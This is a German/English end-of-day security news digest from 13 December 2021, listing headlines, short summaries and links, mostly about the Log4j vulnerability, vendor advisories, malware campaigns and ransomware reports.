Tageszusammenfassung - 13.12.2021

End-of-Day report

Timeframe: Freitag 10-12-2021 18:00 - Montag 13-12-2021 18:00 Handler: Dimitri Robl Co-Handler: Thomas Pribitzer

News

Schutz vor Log4j-Lücke - was hilft jetzt und was eher nicht

"Warnstufe Rot" für Anwender und Firmen, doch was bedeutet das konkret? So testen Sie Dienste auf die Log4j-Lücke und reduzieren ihr Risiko vor Angriffen.

https://heise.de/-6292961


log4j-scan

We have been researching the Log4J RCE (CVE-2021-44228) since it was released, and we worked in preventing this vulnerability with our customers. We are open-sourcing an open detection and scanning tool for discovering and fuzzing for Log4J RCE CVE-2021-44228 vulnerability.

https://github.com/fullhunt/log4j-scan


Ten families of malicious samples are spreading using the Log4j2 vulnerability Now

On December 11, 2021, at 8:00 pm, we published a blog disclosing Mirai and Muhstik botnet samples propagating through Log4j2 RCE vulnerability[1]. Over the past 2 days, we have captured samples from other families, and now the list of families has exceeded 10.

https://blog.netlab.360.com/ten-families-of-malicious-samples-are-spreading-using-the-log4j2-vulnerability-now/


log4j-jndi-be-gone: A simple mitigation for CVE-2021-44228

tl;dr Run add our new tool, -javaagent:log4j-jndi-be-gone-1.0.0-standalone.jar to all of your JVM Java stuff to stop log4j from loading classes remotely over LDAP. This will prevent malicious inputs from triggering the -Log4Shell- vulnerability and gaining remote code execution on your systems. In this post, we first offer some context on the vulnerability, the released fixes [...]

https://research.nccgroup.com/2021/12/12/log4j-jndi-be-gone-a-simple-mitigation-for-cve-2021-44228/


Malicious PyPI packages with over 10,000 downloads taken down

The Python Package Index (PyPI) registry has removed three malicious Python packages aimed at exfiltrating environment variables and dropping trojans on the infected machines. These malicious packages are estimated to have generated over 10,000 downloads and mirrors put together, according to the researchers report.

https://www.bleepingcomputer.com/news/security/malicious-pypi-packages-with-over-10-000-downloads-taken-down/


Karakurt: A New Emerging Data Theft and Cyber Extortion Hacking Group

A previously undocumented, financially motivated threat group has been connected to a string of data theft and extortion attacks on over 40 entities between September and November 2021. The hacker collective, which goes by the self-proclaimed name Karakurt and was first identified in June 2021, is capable of modifying its tactics and techniques to adapt to the targeted environment, [...]

https://thehackernews.com/2021/12/karakurt-new-emerging-data-theft-and.html


HANCITOR DOC drops via CLIPBOARD

Hancitor, a loader that provides Malware as a Service, has been observed distributing malware such as FickerStealer, Pony, CobaltStrike, Cuba Ransomware, and many more. Recently at McAfee Labs, we observed Hancitor Doc VBA (Visual Basic for Applications) samples dropping the payload using the Windows clipboard through Selection.Copy method.

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/hancitor-doc-drops-via-clipboard/


Diavol Ransomware

In the past, threat actors have used BazarLoader to deploy Ryuk and Conti ransomware, as reported on many occasions. In this intrusion, however, a BazarLoader infection resulted in deployment of Diavol Ransomware.

https://thedfirreport.com/2021/12/13/diavol-ransomware/


Bugs in the Cloud: How One Vulnerability Exposed 'Offline' Devices to a Security Risk

The post Bugs in the Cloud: How One Vulnerability Exposed -Offline- Devices to a Security Risk appeared first on Claroty.

https://claroty.com/2021/12/13/blog-research-bugs-in-the-cloud-how-one-vulnerability-exposed-offline-devices-to-a-security-risk/


Von wegen Darknet - Ransomware-Gangs setzen Opfer per Social Media unter Druck

Ransomware-Gruppen nutzen soziale Netzwerkkanäle, um ihre Angriffe zu bewerben und damit ihre Opfer weiter zur Lösegeldzahlung unter Druck zu setzen.

https://blog.emsisoft.com/de/39431/von-wegen-darknet-ransomware-gangs-setzen-opfer-per-social-media-unter-druck/


Now You Serial, Now You Don't - Systematically Hunting for Deserialization Exploits

Deserialization vulnerabilities are a class of bugs that have plagued multiple languages and applications over the years. These include Exchange (CVE-2021-42321), Zoho ManageEngine (CVE-2020-10189), Jira (CVE-2020-36239), Telerik (CVE-2019-18935), Jenkins (CVE-2016-9299), and more. Fundamentally, these bugs are a result of applications placing too much trust in data that a user (or attacker) can tamper with.

https://www.mandiant.com/resources/hunting-deserialization-exploits

Vulnerabilities

Log4j Vulnerability (CVE-2021-44228)

This repo contains operational information regarding the vulnerability in the Log4j logging library (CVE-2021-44228).

https://github.com/NCSC-NL/log4shell


VMSA-2021-0028

[...] Synopsis: VMware Response to Apache Log4j Remote Code Execution Vulnerability (CVE-2021-44228)

https://www.vmware.com/security/advisories/VMSA-2021-0028.html


Log4j Zero-Day Vulnerability

IBM X-Force Incident Command is following a recent disclosure regarding a vulnerability in the in the Log4j Java library. A report by LunaSec details the vulnerability as well as mitigation strategies for the vulnerability.

https://exchange.xforce.ibmcloud.com/collection/4daa3df4f73a51590efced7fb90bc949


Bugs in billions of WiFi, Bluetooth chips allow password, data theft

Researchers at the University of Darmstadt, Brescia, CNIT, and the Secure Mobile Networking Lab, have published a paper that proves its possible to extract passwords and manipulate traffic on a WiFi chip by targeting a devices Bluetooth component.

https://www.bleepingcomputer.com/news/security/bugs-in-billions-of-wifi-bluetooth-chips-allow-password-data-theft/


IBM Security Bulletins 2021-12-10 - 2021-13

WebSphere Application Server, Rational Application Developer for WebSphere, Spectrum Copy Data Management, Tivoli Netcool, Spectrum Protect, i2 Analystss Notebook, Decision Optimization Center, ILOG CPLEX Optimization Studio, PowerVM, Db2

https://www.ibm.com/blogs/psirt/


Security updates for Monday

Security updates have been issued by Arch Linux (chromium, firefox, gitlab, grafana, grafana-agent, thunderbird, and vivaldi), Debian (apache-log4j2, privoxy, and wireshark), Fedora (firefox, grub2, mariadb, mod_auth_openidc, rust-drg, rust-tiny_http, and rust-tiny_http0.6), Mageia (chromium-browser-stable, curaengine, fetchmail, firefox, libvirt, log4j, opencontainers-runc, python-django, speex, and thunderbird), openSUSE (clamav, firefox, glib-networking, glibc, gmp, ImageMagick, log4j, [...]

https://lwn.net/Articles/878520/


CISA Adds Thirteen Known Exploited Vulnerabilities to Catalog

CISA has added thirteen new vulnerabilities to its Known Exploited Vulnerabilities Catalog, based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.

https://us-cert.cisa.gov/ncas/current-activity/2021/12/10/cisa-adds-thirteen-known-exploited-vulnerabilities-catalog


Oracle Security Alert for CVE-2021-44228 - 10 December 2021

https://www.oracle.com/security-alerts/alert-cve-2021-44228.html


Vulnerability in Apache Log4j Library Affecting Cisco Products: December 2021

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd


Citrix Security Advisory for Apache CVE-2021-44228

https://support.citrix.com/article/CTX335705